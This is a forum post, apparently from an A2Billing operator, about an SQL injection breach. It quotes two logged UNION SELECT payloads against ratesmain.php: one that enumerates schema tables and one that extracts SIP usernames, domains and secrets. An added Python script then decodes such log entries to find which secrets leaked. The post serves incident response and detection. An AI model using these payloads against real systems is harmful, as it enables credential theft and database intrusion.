Seems the crooks got my database using:
/xxxcard/ratesmain.php?cnt=&al=A'+and+1=0+%20Union%20Select%20%201%20,2,3,%20UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),id_cc_card,char(59),fromuser,char(59),fromdomain,char(59),secret,char(59),CHAR(64),CHAR(95),CHAR(64))))%20+FROM+a2billing.cc_sip_buddies%20%20LIMIT%205,1--%20-
and
requests look like:
/xxxxxcard/ratesmain.php?cnt=&al=A'+and+1=0+%20Union%20Select%20%201%20,2,3,%20UNHEX(HEX(concat(0xxxxxxxx,table_name,xxxxxxxx)))%20+FROM+INFORMATION_SCHEMA.tables+where+table_schema=Concat(char(97),char(115),char(116),char(101),char(114),char(105),char(115),char(107))+LIMIT%209,1--%20-
This request gets the table names/info directly from the DB.
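
For triaging entries like the two above in a web access log, this added example (not part of the original post) URL-decodes each query parameter, expands the CHAR(n) runs into the strings they spell, and reports which tables and which row offset each request read. The function names and the fields of the returned findings are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# The two request lines from the post above, copied as posted (paths are redacted there).
SAMPLE_REQUESTS = [
    "/xxxcard/ratesmain.php?cnt=&al=A'+and+1=0+%20Union%20Select%20%201%20,2,3,%20UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),id_cc_card,char(59),fromuser,char(59),fromdomain,char(59),secret,char(59),CHAR(64),CHAR(95),CHAR(64))))%20+FROM+a2billing.cc_sip_buddies%20%20LIMIT%205,1--%20-",
    "/xxxxxcard/ratesmain.php?cnt=&al=A'+and+1=0+%20Union%20Select%20%201%20,2,3,%20UNHEX(HEX(concat(0xxxxxxxx,table_name,xxxxxxxx)))%20+FROM+INFORMATION_SCHEMA.tables+where+table_schema=Concat(char(97),char(115),char(116),char(101),char(114),char(105),char(115),char(107))+LIMIT%209,1--%20-",
]

CHAR_RUN = re.compile(r"\bchar\(\d+\)(?:\s*,\s*char\(\d+\))*", re.I)
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
FROM = re.compile(r"\bfrom\s+([\w.]+)", re.I)   # needs whitespace, so "fromuser" is not a hit
LIMIT = re.compile(r"\blimit\s+(\d+)\s*,\s*(\d+)", re.I)


def decode_char_runs(sql):
    """Replace each CHAR(n),CHAR(n),... run with the quoted string it spells."""
    def spell(match):
        codes = re.findall(r"\d+", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_RUN.sub(spell, sql)


def triage(request):
    """Return one finding per query parameter that carries a UNION SELECT."""
    findings = []
    for pair in urlsplit(request).query.split("&"):
        name, _, raw = pair.partition("=")       # payload itself contains '=' signs
        sql = re.sub(r"\s+", " ", unquote_plus(raw))
        if not UNION.search(sql):
            continue
        decoded = decode_char_runs(sql)
        limit = LIMIT.search(decoded)
        findings.append({
            "param": name,                        # the injectable parameter
            "tables": FROM.findall(decoded),      # what was read
            "row_offset": int(limit.group(1)) if limit else None,
            "decoded": decoded,
        })
    return findings


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        for f in triage(req):
            print(f["param"], f["tables"], f["row_offset"])
            print("   ", f["decoded"])
```

Grouping the findings by table and collecting the row offsets across a whole log shows which rows of cc_sip_buddies were read, and therefore which SIP secrets need to be changed.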